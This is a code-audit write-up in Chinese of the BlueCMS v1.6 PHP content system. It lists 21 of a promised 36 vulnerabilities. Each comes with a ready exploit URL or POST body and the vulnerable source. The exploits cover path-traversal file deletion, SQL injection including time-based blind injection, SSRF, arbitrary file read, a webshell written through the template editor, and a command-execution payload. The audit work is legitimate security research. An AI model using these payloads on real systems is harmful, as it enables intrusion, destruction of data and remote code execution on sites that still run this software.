代码审计:Bluecms v1.6

代码审计:Bluecms v1.6

漏洞列表如下(共计36个漏洞,附Exp,按时间顺序):
未完待续…

1、user.php 766行处存在任意文件删除漏洞

Exp:``http://127.0.0.3/bluecms/user.php?act=edit_user_info Post:face_pic3=2.php`

elseif($act == 'edit_user_info'){
	 $user_id = intval($_SESSION['user_id']);
	 if(empty($user_id)){
		 return false;
	 }
	$birthday = trim($_POST['birthday']);
	$sex = intval($_POST['sex']);
    $email = !empty($_POST['email']) ? trim($_POST['email']) : '';
    $msn = !empty($_POST['msn']) ? trim($_POST['msn']) : '';
    $qq = !empty($_POST['qq']) ? trim($_POST['qq']) : '';
    $mobile_phone = !empty($_POST['mobile_phone']) ? trim($_POST['mobile_phone']) : '';
    $office_phone = !empty($_POST['office_phone']) ? trim($_POST['office_phone']) : '';
    $home_phone   = !empty($_POST['home_phone']) ? trim($_POST['home_phone']) : '';
	$address = !empty($_POST['address']) ? htmlspecialchars($_POST['address']) : '';

	if (!empty($_POST['face_pic1'])){
        if (strpos($_POST['face_pic1'], 'http://') != false && strpos($_POST['face_pic1'], 'https://') != false){
           showmsg('只支持本站相对路径地址');
         }
        else{
           $face_pic = trim($_POST['face_pic1']);
        }
    }else{
		if(file_exists(BLUE_ROOT.$_POST['face_pic3'])){
			@unlink(BLUE_ROOT.$_POST['face_pic3']);
		}
	}

	if(isset($_FILES['face_pic2']['error']) && $_FILES['face_pic2']['error'] == 0){
		$face_pic = $image->img_upload($_FILES['face_pic2'],'face_pic');
	}
    $face_pic = empty($face_pic) ? '' : $face_pic;

	$sql = "UPDATE ".table('user')." SET birthday = '$birthday', sex = '$sex', face_pic = '$face_pic', email = '$email', msn = '$msn', qq = '$qq'," .
			" mobile_phone = '$mobile_phone', office_phone = '$office_phone', home_phone = '$home_phone', address='$address' WHERE user_id = ".intval($_SESSION['user_id']);
	$db->query($sql);
	showmsg('更新个人资料成功', 'user.php');
 }

2、ad_js.php 19行处存在sql注入漏洞

Exp:view-source:http://127.0.0.3/bluecms/ad_js.php?ad_id=12%20+UNION%20+SELECT+1,2,3,4,5,6,database()

$ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id);
if($ad['time_set'] == 0)
{
	$ad_content = $ad['content'];
}
else
{
	if($ad['end_time'] < time())
	{
		$ad_content = $ad['exp_content'];
	}
	else
	{
		$ad_content = $ad['content'];
	}
}
$ad_content = str_replace('"', '\"',$ad_content);
$ad_content = str_replace("\r", "\\r",$ad_content);
$ad_content = str_replace("\n", "\\n",$ad_content);
echo "<!--\r\ndocument.write(\"".$ad_content."\");\r\n-->\r\n";

3、include/common.fun.php->getip()存在ip伪造漏洞

function getip()
{
	if (getenv('HTTP_CLIENT_IP'))
	{
		$ip = getenv('HTTP_CLIENT_IP'); 
	}
	elseif (getenv('HTTP_X_FORWARDED_FOR')) 
	{ //获取客户端用代理服务器访问时的真实ip 地址
		$ip = getenv('HTTP_X_FORWARDED_FOR');
	}
	elseif (getenv('HTTP_X_FORWARDED')) 
	{ 
		$ip = getenv('HTTP_X_FORWARDED');
	}
	elseif (getenv('HTTP_FORWARDED_FOR'))
	{
		$ip = getenv('HTTP_FORWARDED_FOR'); 
	}
	elseif (getenv('HTTP_FORWARDED'))
	{
		$ip = getenv('HTTP_FORWARDED');
	}
	else
	{ 
		$ip = $_SERVER['REMOTE_ADDR'];
	}
	return $ip;
}

4、user.php 955行处存在任意文件删除漏洞

Exp:``http://127.0.0.3/bluecms/user.php?act=del_pic Post:id=2.php`

elseif($act == 'del_pic'){

 	$id = $_REQUEST['id'];
 	$db->query("DELETE FROM ".table('company_image')." WHERE path='$id'");
 	if(file_exists(BLUE_ROOT.$id)){
 		@unlink(BLUE_ROOT.$id);
 	}
 }

5、user.php 476行处存在任意文件删除漏洞

Exp:http://127.0.0.3/bluecms/user.php?act=do_info_edit Post提交post_id=1&title=1&content=1&cat_id=1&area=1&useful_time=1&is_recommend1=1&top_type=1&is_head_line=1&link_man=1&link_phone=1&att1=1&att2=1&top_type1=1&is_head_line1=1&lit_pic=1.php

elseif($act == 'do_info_edit'){
	 $post_id = intval($_REQUEST['post_id']);
	 if(empty($post_id)){
		 return false;
	 }
 	$must_att_arr = array();
 	$nomust_att_arr = array();
 	$title = !empty($_POST['title']) ? trim($_POST['title']) : '';
 	if($title == ''){
 		showmsg('信息标题不能为空');
 	}
 	$cat_id = !empty($_POST['cat_id']) ? trim($_POST['cat_id']) : '';
 	$area = !empty($_POST['area']) ? intval($_POST['area']) : '';
 	$useful_time = intval($_POST['useful_time']);
 	$content = !empty($_POST['content']) ? trim($_POST['content']) : '';
 	if(!empty($content)){
		$content = str_replace(' ', '&nbsp;', str_replace(array("\r\n", "\r", "\n"), "<br/>", $content));
	}
 	
 	$is_recommend	= !empty($_POST['is_recommend']) ? intval($_POST['is_recommend']) : 0;
 	if($_POST['is_recommend1'] == 0){
	 	if($is_recommend == 1){
			$confirm_rec = 1;
	 		$rec_start	= $timestamp;
	 		$rec_time	= $_POST['rec_time'];
	 		if(!preg_match('/^[1-9][0-9]*$/', $rec_time)){
	 			showmsg('推荐时间格式出错');
	 		}
	 		$condition	= " ,rec_start='$rec_start', rec_time='$rec_time' ";
	 	} else {
	 		$rec_time	= 0;
	 		$condition	= '';
	 	}
 	} else {
 		$rec_time	= 0;
 		$condition	= '';
 	}
 	$top_type		= intval($_POST['top_type']);
 	if($_POST['top_type1'] == 0){
 		if($top_type != 0){
			$confirm_top = 1;
 			$top_start	= $timestamp;
 			$top_time	= $_POST['top_time'];
 			if(!preg_match('/^[1-9][0-9]*$/', $top_time)){
	 			showmsg('置顶时间格式出错');
	 		}
 			$condition	.= ",top_start='$top_start', top_time='$top_time' ";
 		} else {
 			$top_time	= 0;
 			$condition .= '';
 		}
 	} else {
 		$top_time	= 0;
 		$condition	.= '';
 	}
	$is_head_line = intval($_POST['is_head_line']);
	if($_POST['is_head_line1'] == 0){
	 	if($is_head_line == 1){
			$confirm_head = 1;
	 		$head_line_start	= $timestamp;
	 		$head_line_time	= $_POST['head_line_time'];
	 		if(!preg_match('/^[1-9][0-9]*$/', $head_line_time)){
	 			showmsg('推荐时间格式出错');
	 		}
	 		$condition	.= " ,head_line_start='$head_line_start', head_line_time='$head_line_time' ";
	 	} else {
	 		$head_line_time	= 0;
	 		$condition	.= '';
	 	}
 	} else {
 		$head_line_time	= 0;
 		$condition	.= '';
 	}

 	$link_man = !empty($_POST['link_man']) ? trim($_POST['link_man']) : '';
 	$link_phone = !empty($_POST['link_phone']) ? trim($_POST['link_phone']) : 0;
 	$link_email = !empty($_POST['link_email']) ? trim($_POST['link_email']) : '';
 	$link_qq = !empty($_POST['link_qq']) ? trim($_POST['link_qq']) : 0;
 	$link_address = !empty($_POST['link_address']) ? trim($_POST['link_address']) : '';
	
 	if($link_man==''){
 		showmsg('联系人姓名不能为空');
 	}
 	if($link_phone==''){
 		showmsg('为了体现信息真实,联系电话不要为空');
 	}
 	$must_att_arr = get_att($model_id, $_POST['att1'], 'must_att');
 	$nomust_att_arr = get_att($model_id, $_POST['att2']);
 	
 	//交易过程
 	$rec_service = $db->getone("SELECT id, price FROM ".table('service')." WHERE type='info' and service='rec'");
	if($top_type == 1){
		$service = 'top1';
	} else {
		$service = 'top2';
	}
 	$top_service = $db->getone("SELECT id, price FROM ".table('service')." WHERE type='info' and service='$service'");

	$head_line_service = $db->getone("SELECT id, price FROM ".table('service')." WHERE type='info' and service='head_line'");
	$money = $_SESSION['money'] - $rec_service['price'] * $rec_time - $top_service['price'] * $top_time - $head_line_service['price'] * $head_line_time;
	if ($money < 0){
		showmsg('对不起,您的余额不足,请充值');
	}
	if	($confirm_rec == 1) {
		$db->query("INSERT INTO ".table('buy_record')." (id, user_id, aid, pid, exp, time) 
		VALUES ('', '$_SESSION[user_id]', '$post_id', '$rec_service[id]', '$rec_time', '$timestamp'");
	}
	if ($confirm_top == 1) {
		$db->query("INSERT INTO ".table('buy_record')." (id, user_id, aid, pid, exp, time)
		VALUES ('', '$_SESSION[user_id]', '$post_id', '$top_service[id]', '$top_time', '$timestamp'");
	}
	if ($confirm_head == 1) {
		$db->query("INSERT INTO ".table('buy_record')." (id, user_id, aid, pid, exp, time)
		VALUES ('', '$_SESSION[user_id]', '$post_id', '$top_service[id]', '$head_line_time', '$timestamp'");
	}
	//从用户账户扣除花费金币
	$db->query("UPDATE ".table('user')." SET money='$money' WHERE user_id=$_SESSION[user_id]");
 	
	//更新post表SQL语句
 	$sql = "UPDATE ".table('post')." SET cat_id='$cat_id', area_id='$area', title='$title', 
 	keywords='$keywords', content='$content', link_man='$link_man', link_phone='$link_phone', 
 	is_recommend='$is_recommend', top_type='$top_type', is_head_line='$is_head_line' ".$condition.", link_email='$link_email', 
 	link_qq='$link_qq', link_address='$link_address', useful_time='$useful_time' WHERE post_id=".$post_id;
 	$db->query($sql);
 	
 	//插入新属性
 	$db->query("DELETE FROM ".table('post_att')." WHERE post_id =".$post_id);
 	insert_att_value($must_att_arr, $post_id);
 	insert_att_value($nomust_att_arr, $post_id);
 	
 	//插入新图片
	$db->query("DELETE FROM ".table('post_pic')." WHERE post_id = ".$post_id);
 	for($i=0;$i<4;$i++){
 		if($_POST['pic'.$i] && file_exists(BLUE_ROOT.$_POST['pic'.$i])){
 			$sql = "INSERT INTO ".table('post_pic')." (pic_id, post_id, pic_path) VALUES ('', '$post_id', '".$_POST['pic'.$i]."')";
 			$db->query($sql);
 		}
 	}
	//如果没有图片,则将信息缩略图设置为默认图片
	if (file_exists(BLUE_ROOT.$_POST['lit_pic'])) {
		@unlink(BLUE_ROOT.$_POST['lit_pic']);
	}
	if($_POST['pic0']){
		
		$lit_pic = $image->small_img($_POST['pic0'], 126, 80);
		$db->query("UPDATE ".table('post')." SET lit_pic='$lit_pic' WHERE post_id='$post_id'");
	}else{
		$db->query("UPDATE ".table('post')." SET lit_pic='' WHERE post_id='$post_id'");
	}
	
 	showmsg('编辑信息成功', 'user.php?act=manage');
 }

6、admin/article.php 132行处存在后台sql注入漏洞

Exp:http://127.0.0.3/bluecms/admin/article.php?act=del&id=1 and if(length(select database())=7,1,sleep(10)) 时间盲注

elseif($act == 'del'){
	$article = $db->getone("SELECT cid, lit_pic FROM ".table('article')." WHERE id=".$_GET['id']);
 	$sql = "DELETE FROM ".table('article')." WHERE id=".intval($_GET['id']);
 	$db->query($sql);
 	if (file_exists(BLUE_ROOT.$article['lit_pic'])) {
 		@unlink(BLUE_ROOT.$article['list_pic']);
 	}
 	showmsg('删除本地新闻成功', 'article.php?cid='.$article['cid']);
 }

7、admin/article.php 85行处存在任意文件删除漏洞

Exp:article.html如下:

<!DOCTYPE html>
<html>
<head>
    <title>Form with File Upload and Additional Parameters</title>
</head>
<body>
<form action="http://127.0.0.3/bluecms/admin/article.php?act=do_edit" method="post" enctype="multipart/form-data">
    <input type="hidden" name="title" value="1">
    <input type="hidden" name="color" value="1">
    <input type="hidden" name="cid" value="1">
    <input type="hidden" name="author" value="admin">
    <input type="hidden" name="source" value="1">
    <input type="hidden" name="is_recommend" value="1">
    <input type="hidden" name="is_check" value="1">

    <label for="lit_pic1">要删除的文件名:</label>
    <input type="text" id="lit_pic1" name="lit_pic1"><br><br>

    <label for="lit_pic2">Upload Picture 2:</label>
    <input type="file" id="lit_pic2" name="lit_pic2"><br><br>

    <input type="submit" value="Submit">
</form>
</body>
</html>
elseif($act == 'do_edit'){
 	$title = !empty($_POST['title']) ? trim($_POST['title']) : '';
 	$color = !empty($_POST['color']) ? trim($_POST['color']) : '';
 	$cid = !empty($_POST['cid']) ? intval($_POST['cid']) : '';
 	if(empty($cid)){
 		showmsg('新闻分类不能为空');
 	}
 	$author = !empty($_POST['author']) ? trim($_POST['author']) : $_SESSION['admin_name'];
 	$source = !empty($_POST['source']) ? trim($_POST['source']) : '';
 	$is_recommend = intval($_POST['is_recommend']);
 	$is_check = intval($_POST['is_check']);

 	if((!empty($_POST['lit_pic1']) && !empty($_FILES['lit_pic2']['name'])) || !empty($_FILES['lit_pic2']['name']))
	{
		if (file_exists(BLUE_ROOT . $_POST['lit_pic1']))
		{
			@unlink(BLUE_ROOT . $_POST['lit_pic1']);
		}
 		if($_FILES['lit_pic2']['error'] == 0)
		{
			$lit_pic = $image->img_upload($_FILES['lit_pic2'],'lit_pic');
		}
	    $lit_pic = empty($lit_pic) ? '' : $lit_pic;
		if(!empty($lit_pic)){
			$lit_pic = $image->small_img($lit_pic, 200, 115);
	    }
 	}else{
 		$lit_pic = !empty($_POST['lit_pic1']) ? $_POST['lit_pic1'] :'';
 	}
 	$content = !empty($_POST['content']) ? trim($_POST['content']) : '';
	$descript = !empty($_POST['descript']) ? mb_substr($_POST['descript'], 0, 250) : mb_substr(html2text($_POST['content']),0, 250);

 	if($title == ''){
 		showmsg('新闻标题不能为空');
 	}
 	if($content == ''){
 		showmsg('新闻内容不能为空');
 	}

 	$sql = "UPDATE ".table('article')." SET cid='$cid', title='$title', color='$color', author='$author', 
 	source='$source', lit_pic='$lit_pic', descript='$descript', content='$content', 
 	is_recommend='$is_recommend', is_check='$is_check' WHERE id=".intval($_POST['id']);
 	$db->query(($sql));
 	showmsg('编辑新闻成功', 'article.php?cid='.$cid);
 }

8、admin/attachment.php 78行处存在后台sql注入漏洞

Exp:http://127.0.0.3/bluecms/admin/attachment.php?act=del&att_id=1 and if(length(select database())=7,1,sleep(10)) 时间盲注

 elseif($_REQUEST['act'] == 'del')
 {
 	$sql = "DELETE FROM ".table('attachment')." WHERE att_id = ".$_GET['att_id'];
 	if(!$db->query($sql)){
 		showmsg('删除附加属性出错', true);
 	}
 	showmsg('删除附加属性成功','attachment.php', true);
 }

9、admin/database.php 208行处存在任意文件删除漏洞

Exp:http://127.0.0.3/bluecms/admin/article.php?act=del&file_name=../1.php

elseif($act == 'del')
{
 	$file_name = !empty($_GET['file_name']) ? trim($_GET['file_name']) : '';
	$file = BLUE_ROOT.DATA."backup/".$file_name;
	if(!@unlink($file))
	{
		showmsg('删除备份文件失败');
	}
	else
	{
		showmsg('删除备份文件成功', 'database.php?act=restore');
	}
 }

10、admin/flash.php 47行处存在任意文件删除漏洞

Exp:http://127.0.0.3/bluecms/admin/flash.php?act=do_edit Post:image_id=1&image_path2=../1.php

elseif($act == 'do_edit'){
	 if(empty($_POST['image_id'])){
		return false;
	}
 	$image_link = !empty($_POST['image_link']) ? trim($_POST['image_link']) : '';
 	$show_order = !empty($_POST['show_order']) ? intval($_POST['show_order']) : '';
	$image_path = !empty($_POST['image_path']) ? trim($_POST['image_path']) : '';
	if (!empty($_POST['image_path'])){
        if (strpos($_POST['image_path'], 'http://') != false && strpos($_POST['image_path'], 'https://') != false){
           showmsg('只支持本站相对路径地址');
         }
        else{
           $link_logo = trim($_POST['image_path']);
        }
    }else{
		if(file_exists(BLUE_ROOT.$_POST['image_path2'])){
			@unlink(BLUE_ROOT.$_POST['image_path2']);
		}
	}

 	if(isset($_FILES['image_path1']['error']) && $_FILES['image_path1']['error'] == 0){
		$image_path = $image->img_upload($_FILES['image_path1'],'flash');
		
	}

    $image_path = empty($image_path) ? '' : $image_path;
    if(!$db->query("UPDATE ".table('flash_image')." SET image_path='$image_path', image_link='$image_link', show_order='$show_order' WHERE image_id=".intval($_POST['image_id']))){
    	showmsg('更新flash图片出错', true);
    }else{
    	showmsg('更新flash图片成功', 'flash.php', true);
    }
 }
elseif($act == 'del'){
	if(empty($_GET['image_id'])){
		return false;
	}
	$flash = $db->getone("SELECT image_path FROM ".table('flash_image')." WHERE image_id =".intval($_GET['image_id']));
	if(file_exists(BLUE_ROOT.$flash['image_path'])){
		@unlink(BLUE_ROOT.$flash['image_path']);
	}
	if(!$db->query("DELETE FROM ".table('flash_image')." WHERE image_id = ".intval($_GET['image_id']))){
  		showmsg('删除Flash图片出错', true);
  	}else{
  		showmsg('删除Flash图片成功!','flash.php', true);
  	}
}

11、admin/flash.php 47行处存在SSRF漏洞

Exp:http://127.0.0.3/bluecms/admin/flash.php?act=do_edit Post:image_id=1&image_path=http://网站 触发:点击flash链接(逻辑漏洞,strpos($_POST['image_path'], 'http://') != false,strpos返回的是位置,如果'http://'在首位,返回0.而0不等于false,从而绕过判断)

elseif($act == 'do_edit'){
	 if(empty($_POST['image_id'])){
		return false;
	}
 	$image_link = !empty($_POST['image_link']) ? trim($_POST['image_link']) : '';
 	$show_order = !empty($_POST['show_order']) ? intval($_POST['show_order']) : '';
	$image_path = !empty($_POST['image_path']) ? trim($_POST['image_path']) : '';
	if (!empty($_POST['image_path'])){
        if (strpos($_POST['image_path'], 'http://') != false && strpos($_POST['image_path'], 'https://') != false){
           showmsg('只支持本站相对路径地址');
         }
        else{
           $link_logo = trim($_POST['image_path']);
        }
    }else{
		if(file_exists(BLUE_ROOT.$_POST['image_path2'])){
			@unlink(BLUE_ROOT.$_POST['image_path2']);
		}
	}

 	if(isset($_FILES['image_path1']['error']) && $_FILES['image_path1']['error'] == 0){
		$image_path = $image->img_upload($_FILES['image_path1'],'flash');
		
	}

    $image_path = empty($image_path) ? '' : $image_path;
    if(!$db->query("UPDATE ".table('flash_image')." SET image_path='$image_path', image_link='$image_link', show_order='$show_order' WHERE image_id=".intval($_POST['image_id']))){
    	showmsg('更新flash图片出错', true);
    }else{
    	showmsg('更新flash图片成功', 'flash.php', true);
    }
 }
elseif($act == 'del'){
	if(empty($_GET['image_id'])){
		return false;
	}
	$flash = $db->getone("SELECT image_path FROM ".table('flash_image')." WHERE image_id =".intval($_GET['image_id']));
	if(file_exists(BLUE_ROOT.$flash['image_path'])){
		@unlink(BLUE_ROOT.$flash['image_path']);
	}
	if(!$db->query("DELETE FROM ".table('flash_image')." WHERE image_id = ".intval($_GET['image_id']))){
  		showmsg('删除Flash图片出错', true);
  	}else{
  		showmsg('删除Flash图片成功!','flash.php', true);
  	}
}

12、admin/link.php 50行处存在SSRF漏洞

Exp:http://127.0.0.3/bluecms/admin/link.php?act=do_edit Post:link_logo=http://网站 触发:点击网站上导航链接

 elseif($act == 'do_edit'){
 	$link_name = !empty($_POST['link_name']) ? trim($_POST['link_name']) : '';
 	$link_site = !empty($_POST['link_site']) ? trim($_POST['link_site']) : '';
 	$show_order = !empty($_POST['show_order']) ? intval($_POST['show_order']) : 0;
	
	if (!empty($_POST['link_logo'])){
        if (strpos($_POST['link_logo'], 'http://') != false && strpos($_POST['link_logo'], 'https://') != false){
           showmsg('只支持本站相对路径地址');
         }
        else{
           $link_logo = trim($_POST['link_logo']);
        }
    }else{
		if(file_exists(BLUE_ROOT.$_POST['link_logo2'])){
			@unlink(BLUE_ROOT.$_POST['link_logo2']);
		}
	}

	if(isset($_FILES['link_logo1']['error']) && $_FILES['link_logo1']['error'] == 0){
		$link_logo = $image->img_upload($_FILES['link_logo1'],'linklogo');
	}
    $link_logo = empty($link_logo) ? '' : $link_logo;
	$sql = "UPDATE ".table('link')." SET linkname = '$link_name', linksite = '$link_site', linklogo = '$link_logo', showorder = '$show_order' WHERE linkid=".intval($_REQUEST['linkid']);
	if(!$db->query($sql)){
		showmsg('编辑链接失败');
	}else{
		showmsg('编辑链接成功','link.php');
	}
 }

13、admin/link.php 50行处存在任意文件删除漏洞

Exp:http://127.0.0.3/bluecms/admin/link.php?act=do_edit Post:link_logo2=../1.php

 elseif($act == 'do_edit'){
 	$link_name = !empty($_POST['link_name']) ? trim($_POST['link_name']) : '';
 	$link_site = !empty($_POST['link_site']) ? trim($_POST['link_site']) : '';
 	$show_order = !empty($_POST['show_order']) ? intval($_POST['show_order']) : 0;
	
	if (!empty($_POST['link_logo'])){
        if (strpos($_POST['link_logo'], 'http://') != false && strpos($_POST['link_logo'], 'https://') != false){
           showmsg('只支持本站相对路径地址');
         }
        else{
           $link_logo = trim($_POST['link_logo']);
        }
    }else{
		if(file_exists(BLUE_ROOT.$_POST['link_logo2'])){
			@unlink(BLUE_ROOT.$_POST['link_logo2']);
		}
	}

	if(isset($_FILES['link_logo1']['error']) && $_FILES['link_logo1']['error'] == 0){
		$link_logo = $image->img_upload($_FILES['link_logo1'],'linklogo');
	}
    $link_logo = empty($link_logo) ? '' : $link_logo;
	$sql = "UPDATE ".table('link')." SET linkname = '$link_name', linksite = '$link_site', linklogo = '$link_logo', showorder = '$show_order' WHERE linkid=".intval($_REQUEST['linkid']);
	if(!$db->query($sql)){
		showmsg('编辑链接失败');
	}else{
		showmsg('编辑链接成功','link.php');
	}
 }

14、admin/info.php 281行处存在任意文件删除漏洞

Exp:http://127.0.0.3/bluecms/admin/info.php?act=do_edit Post:post_id=1&title=1&content=1&cat_id=1&area=1&useful_time=1&is_recommend1=1&top_type=1&is_head_line=1&link_man=1&link_phone=1&att1=1&att2=1&top_type1=1&is_head_line1=1&lit_pic=1.php

elseif($act == 'do_edit')
{
	$must_att_arr = array();
 	$nomust_att_arr = array();
 	$title = !empty($_POST['title']) ? trim($_POST['title']) : '';
 	$cat_id = !empty($_POST['cat_id']) ? trim($_POST['cat_id']) : '';
 	$area = !empty($_POST['area']) ? intval($_POST['area']) : '';
 	$useful_time = intval($_POST['useful_time']);
 	$content = !empty($_POST['content']) ? trim($_POST['content']) : '';
	if(!empty($content))
	{
		$content = str_replace(' ', '&nbsp;', str_replace(array("\r\n", "\r", "\n"), "<br/>", $content));
	}
	$is_check		= !empty($_POST['is_check']) ? intval($_POST['is_check']) : 0;
 	$is_recommend	= !empty($_POST['is_recommend']) ? intval($_POST['is_recommend']) : 0;
 	if($_POST['is_recommend1'] == 0)
 	{
	 	if ($is_recommend == 1)
	 	{
	 		$rec_start	= $timestamp;
	 		$rec_time	= $_POST['rec_time'];
			if(!preg_match('/^[1-9][0-9]*$/', $rec_time))
			{
	 			showmsg('推荐时间格式出错');
	 		}
	 		$condition	= " ,rec_start='$rec_start', rec_time='$rec_time' ";
	 	}
	 	else
	 	{
	 		$rec_time	= '';
	 		$condition	= '';
	 	}
	}
	else
	{
 		$rec_time = '';
		if ($is_recommend == 0)
		{
 			$condition = " ,rec_start='', rec_time='' ";
		}
		else
		{
			$condition = '';
		}
 	}
 	$top_type = !empty($_POST['top_type']) ? intval($_POST['top_type']) : 0;
 	if ($_POST['top_type1'] == 0)
 	{
 		if ($top_type != 0)
 		{
 			$top_start	= $timestamp;
 			$top_time	= $_POST['top_time'];
			if(!preg_match('/^[1-9][0-9]*$/', $top_time))
			{
	 			showmsg('置顶时间格式出错');
	 		}
 			$condition	.= ",top_start='$top_start', top_time='$top_time' ";
 		}
 		else
 		{
 			$top_time	= '';
 			$condition .= '';
 		}
 	}
 	else
 	{
 		$top_time	= '';
 		if ($top_type == 0)
 		{
 			$condition = " ,top_start='', top_time='' ";
 		}
 		else
 		{
 			$condition = '';
 		}
 	}
	$is_head_line = intval($_POST['is_head_line']);
	if($_POST['is_head_line1'] == 0)
	{
	 	if($is_head_line == 1)
	 	{
			$confirm_head = 1;
	 		$head_line_start	= $timestamp;
	 		$head_line_time	= $_POST['head_line_time'];
	 		if(!preg_match('/^[1-9][0-9]*$/', $head_line_time))
	 		{
	 			showmsg('头条时间格式出错');
	 		}
	 		$condition	.= " ,head_line_start='$head_line_start', head_line_time='$head_line_time' ";
	 	}
	 	else
	 	{
	 		$head_line_time	= 0;
	 		$condition	.= '';
	 	}
 	}
 	else
 	{
 		$head_line_time	= 0;
 		$condition	.= '';
 	}

 	$link_man = !empty($_POST['link_man']) ? trim($_POST['link_man']) : '';
 	$link_phone = !empty($_POST['link_phone']) ? trim($_POST['link_phone']) : 0;
 	$link_email = !empty($_POST['link_email']) ? trim($_POST['link_email']) : '';
 	$link_qq = !empty($_POST['link_qq']) ? trim($_POST['link_qq']) : 0;
 	$link_address = !empty($_POST['link_address']) ? trim($_POST['link_address']) : '';

 	if($title == '')
 	{
 		showmsg('信息标题不能为空');
 	}
 	
 	if($top_type==0 && $top_time > 0)
 	{
 		showmsg('只有在开启置顶功能时,才能设置置顶时间');
 	}

 	if($link_man=='')
 	{
 		showmsg('联系人姓名不能为空');
 	}
 	if($link_phone=='')
 	{
 		showmsg('为了体现信息真实,联系电话不要为空');
 	}
 	$must_att_arr = get_att($model_id, $_POST['att1'], 'must_att');
 	$nomust_att_arr = get_att($model_id, $_POST['att2']);
 	
 	$sql = "UPDATE ".table('post')." 
 				SET cat_id='$cat_id', area_id='$area', title='$title', keywords='$keywords', 
 					content='$content', link_man='$link_man', link_phone='$link_phone', 
 					link_email='$link_email', link_qq='$link_qq', link_address='$link_address', 
 					useful_time='$useful_time', is_check='$is_check', is_recommend='$is_recommend' ".
 					$condition.", top_type='$top_type', is_head_line='$is_head_line' 
 	 			WHERE post_id=".intval($post_id);
 	$db->query($sql);
 	
 	$db->query("DELETE FROM ".table('post_att')." WHERE post_id =".intval($post_id));
 	insert_att_value($must_att_arr, $post_id);
 	insert_att_value($nomust_att_arr, $post_id);
	$db->query("DELETE FROM ".table('post_pic')." WHERE post_id=".intval($post_id));
 	for($i=0;$i<4;$i++)
 	{
 		if($_POST['pic'.$i] && file_exists(BLUE_ROOT.$_POST['pic'.$i]))
 		{
 			$sql = "INSERT INTO ".table('post_pic')." (pic_id, post_id, pic_path) VALUES ('', '$post_id', '".$_POST['pic'.$i]."')";
 			$db->query($sql);
 		}
 	}
	if (file_exists(BLUE_ROOT.$_POST['lit_pic']))
	{
		@unlink(BLUE_ROOT.$_POST['lit_pic']);
	}
	if($_POST['pic0'])
	{
		include_once(BLUE_ROOT."include/upload.class.php");
		$image = new upload();
		$lit_pic = $image->small_img($_POST['pic0'],126, 80);
		$db->query("UPDATE ".table('post')." SET lit_pic='$lit_pic' WHERE post_id='$post_id'");
	}
	else
	{
		$db->query("UPDATE ".table('post')." SET lit_pic='' WHERE post_id='$post_id'");
	}
 	showmsg('编辑信息成功', 'info.php?cid='.get_parentid($cat_id));
}

15、admin/info.php 526行处存在任意文件删除漏洞

Exp:http://127.0.0.3/bluecms/admin/info.php?act=del_pic Post:id=../1.php

elseif($act == 'del_pic')
{
 	$id = $_REQUEST['id'];
 	$db->query("DELETE FROM ".table('post_pic')." WHERE pic_path='$id'");
 	if(file_exists(BLUE_ROOT.$id))
 	{
 		@unlink(BLUE_ROOT.$id);
 	}
}

16、admin/link.php 79行处存在任意文件删除漏洞

Exp:http://127.0.0.3/bluecms/admin/link.php?act=del&linkid=1 Post:link_logo=../1.php

elseif($act == 'del'){
	if(empty($_GET['linkid'])){
		return false;
	}
	$link = $db->getone("SELECT linklogo FROM ".table('link')." WHERE linkid=".intval($_GET['linkid']));
	if(file_exists(BLUE_ROOT.$link['linklogo'])){
		@unlink(BLUE_ROOT.$link['linklogo']);
	}
 	$sql = "DELETE FROM ".table('link')." WHERE linkid=".intval($_GET['linkid']);
 	if(!$db->query($sql)){
 		showmsg('删除友情链接失败');
 	}else{
 		showmsg('删除友情链接成功','link.php');
 	}
 }

17、admin/nav.php 63行存在后台sql注入漏洞

Exp:http://127.0.0.3/bluecms/admin/nav.php?act=edit&navid=1 union select 1,2,3,4,user(),6 limit 1,1

elseif($act=='edit')
 {
 	$sql = "select * from ".table('navigate')." where navid = ".$_GET['navid'];
 	$nav = $db->getone($sql);
 	$smarty->assign('nav',$nav);
 	$smarty->assign('act', $act	);
 	$smarty->display('nav_info.htm');
 }

18、admin/tpl_manage.php 47行处存在任意文件写入漏洞,可写入webshell _

_Exp:http://127.0.0.3/bluecms/admin/tpl_manage.php?act=do_edit Post:tpl_name=../../index.php&tpl_content=<?php eval($_POST[1]);?>

 elseif($act == 'do_edit'){
 	$tpl_name = !empty($_POST['tpl_name']) ? trim($_POST['tpl_name']) : '';
 	$tpl_content = !empty($_POST['tpl_content']) ? deep_stripslashes($_POST['tpl_content']) : '';
 	if(empty($tpl_name)){
 		return false;
 	}
 	$tpl = BLUE_ROOT.'templates/default/'.$tpl_name;
 	if(!$handle = @fopen($tpl, 'wb')){
		showmsg("打开目标模版文件 $tpl 失败");
 	}
 	if(fwrite($handle, $tpl_content) === false){
 		showmsg('写入目标 $tpl 失败');
 	}
 	fclose($handle);
 	showmsg('编辑模板成功', 'tpl_manage.php');
 }

19、admin/tpl_manage.php 35行处存在任意文件读取漏洞

Exp:http://127.0.0.3/bluecms/admin/tpl_manage.php?act=edit&tpl_name=../../1.txt

elseif($act == 'edit'){
	$file = $_GET['tpl_name'];
	if(!$handle = @fopen(BLUE_ROOT.'templates/default/'.$file, 'rb')){
		showmsg('打开目标模板文件失败');
	}
	$tpl['content'] = fread($handle, filesize(BLUE_ROOT.'templates/default/'.$file));
	$tpl['content'] = htmlentities($tpl['content'], ENT_QUOTES, GB2312);
	fclose($handle);
	$tpl['name'] = $file;
	template_assign(array('current_act', 'tpl'), array('编辑模板', $tpl));
	$smarty->display('tpl_info.htm');
 }

20、include/filter.inc.php 11行处存在变量覆盖漏洞(影响user.php)

Exp:http://127.0.0.3/bluecms/user.php?{变量名}={变量值}

foreach (array($_GET, $_POST) as $v)
{
	foreach ($v as $k1 => $v1)
	{
		$$k1 = filter($k1, $v1);
	}
}

21、uc_client/lib/uccode.class.php 38行处存在命令执行漏洞

Exp:$message = "[email=attacker@example.com]Hello; system('ls'); [/email]";

	function complie($message) {
		$message = htmlspecialchars($message);
		if(strpos($message, '[/code]') !== FALSE) {
			$message = preg_replace("/\s*\[code\](.+?)\[\/code\]\s*/ies", "\$this->codedisp('\\1')", $message);
		}
		if(strpos($message, '[/url]') !== FALSE) {
			$message = preg_replace("/\[url(=((https?|ftp|gopher|news|telnet|rtsp|mms|callto|bctp|ed2k|thunder|synacast){1}:\/\/|www\.)([^\[\"']+?))?\](.+?)\[\/url\]/ies", "\$this->parseurl('\\1', '\\5')", $message);
		}
		if(strpos($message, '[/email]') !== FALSE) {
